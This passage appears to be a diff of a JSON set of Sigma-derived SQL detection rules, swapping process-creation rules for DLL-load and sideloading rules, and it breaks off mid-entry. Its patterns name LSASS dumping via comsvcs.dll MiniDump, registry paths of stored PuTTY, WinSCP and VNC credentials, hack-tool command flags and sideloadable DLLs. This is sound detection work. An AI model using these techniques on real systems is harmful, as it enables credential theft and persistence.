"f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Potential Wazuh Security Platform DLL Sideloading", + "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_wazuh.yml" }, { - "title": "Enumeration for 3rd Party Creds From CLI", - "id": "87a476dc-0079-4583-a985-dee7a20a03de", - "status": "experimental", - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "status": "test", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "PUA - Adidnsdump Execution", - "id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", - "status": "test", - "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", - "author": "frack113", + "title": "Third Party Software DLL Sideloading", + "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%adidnsdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_python_adidnsdump.yml" + "filename": "image_load_side_load_third_party.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", - "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "title": "Unsigned Image Loaded Into LSASS Process", + "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", "status": "test", - "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", - "author": "@neu5ron", + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.persistence", - "attack.t1542.003" + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Valid user connecting using RDP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" ], - "filename": "proc_creation_win_bcdedit_susp_execution.yml" + "filename": "image_load_unsigned_image_loaded_into_lsass.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "status": "test", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", - "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "title": "VMGuestLib DLL Sideload", + "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "status": "experimental", + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Rare System Admin Activity" + "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "image_load_side_load_vmguestlib.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", - "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CLR DLL Loaded Via Office Applications", + "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "status": "test", + "description": "Detects CLR DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "image_load_office_dotnet_clr_dll_load.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Other scripts" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", - "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "status": "experimental", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.persistence", + 